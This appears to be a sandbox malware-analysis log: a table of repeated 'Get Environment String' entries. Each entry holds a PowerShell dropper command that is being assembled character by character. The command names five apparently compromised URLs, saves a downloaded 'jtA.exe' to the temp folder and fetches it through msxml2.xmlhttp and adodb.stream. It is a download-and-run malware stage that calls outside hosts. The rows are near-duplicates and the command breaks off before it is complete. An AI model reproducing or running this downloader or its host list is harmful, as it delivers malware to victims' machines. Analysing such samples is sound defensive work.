| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){t |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){tr |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{ |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$ |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$s |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sf |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF. |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.o |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.op |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.ope |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open( |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open(' |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('G |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GE |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET' |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET', |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$ |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$p |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pp |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph, |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0 |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0) |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0); |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$ |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$s |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sf |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF. |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.s |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.se |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.sen |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send( |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send() |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send(); |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();I |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ( |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($ |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($s |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sf |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF. |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.S |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.St |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Sta |
|
1 | |
| Get Environment String | name = qJP, result_out = !qJP!powershell $Xmp='XQc';$iDj='http://lifewithdogmovie.com/0K3jRwA@http://mimhoff.com/FvfyvHFBzf@http://tourdezsokolat.hu/zuyhGc7sq8@http://salon-gabriela.pl/HeF32DnjQl@http://uutiset.helppokoti.fi/86YAZjQ'.Split('@');$Xil=([System.IO.Path]::GetTempPath()+'\jtA.exe');$sfF =New-Object -com 'msxml2.xmlhttp';$Rvi = New-Object -com 'adodb.stream';foreach($pph in $iDj){try{$sfF.open('GET',$pph,0);$sfF.send();If ($sfF.Stat |
|
1 | |
